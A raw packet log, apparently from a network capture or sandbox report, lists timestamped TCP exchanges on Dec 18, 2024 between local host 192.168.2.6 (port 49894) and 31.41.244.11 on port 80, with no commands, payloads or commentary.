                                                                                                                                                                  Dec 18, 2024 11:09:19.229947090 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.230176926 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.230218887 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.231292963 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.231345892 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.231376886 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.231415987 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.232677937 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.232732058 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.232760906 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.232800961 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.234208107 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.234245062 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.234251976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.234278917 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.235584974 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.235632896 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.235801935 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.235840082 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.236991882 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.237040043 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.237162113 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.237201929 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.238434076 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.238487959 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.238523960 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.238564014 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.239847898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.239888906 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.240017891 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.240056038 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.241224051 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.241266012 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.241345882 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.241386890 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.242675066 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.242724895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.242897987 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.242938042 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.244112015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.244154930 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.244215965 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.244255066 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.245533943 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.245578051 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.245646000 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.245685101 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.247008085 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.247054100 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.247107983 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.247145891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.248419046 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.248465061 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.248527050 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.248568058 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.249865055 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.249912024 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.249954939 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.249993086 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.251360893 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.251420021 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.251457930 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.251501083 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.252684116 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.252737045 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.252861977 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.252904892 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.254339933 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.254393101 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.254549980 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.254590988 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.255559921 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.255600929 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.255686998 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.255736113 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.256994009 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.257049084 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.257127047 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.257172108 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.258424044 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.258522987 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.258529902 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.258574963 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.260349989 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.260404110 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.260417938 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.260459900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.261452913 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.261513948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.261528015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.261562109 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.262778997 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.262831926 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.262836933 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.262870073 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.264178038 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.264234066 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.264270067 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.264312983 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.265605927 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.265652895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.265758038 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.265795946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.267035961 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.267059088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.267072916 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.267093897 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.268435955 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.268471003 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.268529892 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.268631935 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.269906044 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.269942045 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.269985914 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.270019054 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.271342993 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.271394014 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.271394968 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.271428108 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.272757053 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.272804976 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.272829056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.272864103 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.274276972 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.274329901 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.274398088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.274437904 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.275614023 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.275657892 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.275710106 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.275749922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.277079105 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.277118921 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.277184963 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.277224064 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.278570890 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.278610945 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.278614044 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.278645992 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.279870987 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.279911995 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.279983997 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.280021906 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.281383038 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.281424999 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.281454086 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.281491041 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.282756090 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.282799006 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.282802105 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.282839060 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.284228086 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.284267902 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.284313917 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.284349918 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.285621881 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.285665989 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.405729055 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.405824900 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.405839920 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.405886889 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.406183004 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.406225920 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.406286955 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.406327009 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.407393932 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.407433987 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.407500982 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.407541990 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.408579111 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.408626080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.408668995 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.408708096 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.409826994 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.409874916 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.410015106 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.410056114 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.411020041 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.411066055 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.411107063 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.411144018 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.412276030 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.412319899 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.412362099 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.412401915 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.413495064 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.413541079 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.413650036 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.413688898 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.414721966 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.414768934 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.414808035 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.414850950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.415930986 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.415982008 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.416023016 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.416063070 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.417180061 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.417222977 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.417272091 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.417315006 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.418395042 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.418443918 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.418513060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.418551922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.419621944 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.419666052 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.419682980 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.419722080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.420811892 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.420857906 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.420957088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.420999050 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.422035933 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.422079086 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.422123909 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.422163010 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.423324108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.423360109 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.423376083 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.423398972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.424484015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.424530029 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.424618959 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.424659014 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.425745010 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.425795078 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.425838947 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.425880909 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.426944971 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.426992893 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.427089930 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.427129030 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.428195953 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.428244114 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.428313017 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.428353071 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.429454088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.429466963 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.429502010 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.430615902 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.430669069 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.430696011 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.430737972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.431904078 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.431950092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.432064056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.432106972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.433115005 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.433165073 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.433199883 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.433238983 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.434308052 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.434353113 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.434386015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.434427023 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.435627937 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.435673952 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.435676098 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.435709000 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.436793089 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.436836958 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.437020063 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.437062025 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.438020945 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.438060045 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.438106060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.438148975 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.439212084 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.439254999 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.439300060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.439338923 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.440571070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.440582991 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.440613985 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.440659046 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.442033052 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.442106962 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.442140102 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.442181110 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.442872047 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.442918062 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.442985058 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.443027020 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.444138050 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.444181919 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.444293976 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.444336891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.445382118 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.445429087 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.447861910 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.447891951 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.447902918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.447912931 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.447916031 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.447932005 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.447958946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.448132992 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.448173046 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.449095011 CET804989431.41.244.11192.168.2.6
